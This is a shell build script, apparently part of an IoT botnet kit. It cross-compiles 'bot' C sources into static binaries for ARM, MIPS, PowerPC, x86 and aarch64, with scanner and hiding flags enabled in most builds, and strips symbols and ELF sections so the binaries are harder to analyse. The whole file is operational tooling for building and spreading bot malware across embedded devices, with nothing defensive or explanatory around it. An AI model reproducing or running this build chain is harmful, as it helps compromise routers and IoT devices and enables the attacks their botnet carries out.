rm -rf bins
mkdir bins
~/Desktop/cross-compilers/armv4l/bin/armv4l-gcc bot/*.c -DSCANNER -DHIDE -O3 -static -fomit-frame-pointer -fdata-sections -ffunction-sections -Wl,--gc-sections -o bins/armv4l
~/Desktop/cross-compilers/armv4l/bin/armv4l-strip bins/armv4l -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr
~/Desktop/cross-compilers/armv7l/bin/armv7l-gcc bot/*.c $3 -DSCANNER -DHIDE -O3 -static -fomit-frame-pointer -fdata-sections -ffunction-sections -Wl,--gc-sections -o bins/armv7l
~/Desktop/cross-compilers/armv7l/bin/armv7l-strip bins/armv7l -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr
~/Desktop/cross-compilers/armv5l/bin/armv5l-gcc bot/*.c $3 -DSCANNER -DHIDE -O3 -static -fomit-frame-pointer -fdata-sections -ffunction-sections -Wl,--gc-sections -o bins/armv5l
~/Desktop/cross-compilers/armv5l/bin/armv5l-strip bins/armv5l -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr
~/Desktop/cross-compilers/i586/bin/i586-gcc bot/*.c $3 -DSCANNER -O3 -DHIDE -static -fomit-frame-pointer -fdata-sections -ffunction-sections -Wl,--gc-sections -o bins/i586
~/Desktop/cross-compilers/i586/bin/i586-strip bins/i586 -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr
~/Desktop/cross-compilers/armv4l/bin/armv4l-gcc bot/*.c -DSCANNER -DHIDE -march=armv5te -mtune=arm926ej-s -msoft-float -mfloat-abi=soft -O3 -static -fomit-frame-pointer -fdata-sections -ffunction-sections -Wl,--gc-sections -o bins/arm926ej
~/Desktop/cross-compilers/armv4l/bin/armv4l-strip bins/arm926ej -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr
~/Desktop/cross-compilers/mips/bin/mips-gcc bot/*.c -O3 -static -fomit-frame-pointer -fdata-sections -ffunction-sections -Wl,--gc-sections -o bins/mips
~/Desktop/cross-compilers/mips/bin/mips-strip bins/mips -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr
~/Desktop/cross-compilers/mipsel/bin/mipsel-gcc bot/*.c -O3 -static -fomit-frame-pointer -fdata-sections -ffunction-sections -Wl,--gc-sections -o bins/mipsel
~/Desktop/cross-compilers/mipsel/bin/mipsel-strip bins/mipsel -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr
~/Desktop/cross-compilers/powerpc/bin/powerpc-gcc bot/*.c -O3 -static -fomit-frame-pointer -fdata-sections -ffunction-sections -Wl,--gc-sections -o bins/powerpc
~/Desktop/cross-compilers/powerpc/bin/powerpc-strip bins/powerpc -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr
~/Desktop/cross-compilers/i686/bin/i686-gcc bot/*.c $3 -DSCANNER -O3 -DHIDE -static -fomit-frame-pointer -fdata-sections -ffunction-sections -Wl,--gc-sections -o bins/i686
~/Desktop/cross-compilers/i686/bin/i686-strip bins/i686 -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr
~/Desktop/cross-compilers/uclibc/bin/aarch64-linux-gcc bot/*.c -static -fomit-frame-pointer -fdata-sections -ffunction-sections -Wl,--gc-sections -o bins/aarch64
~/Desktop/cross-compilers/uclibc/bin/aarch64-linux-strip bins/aarch64 -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr
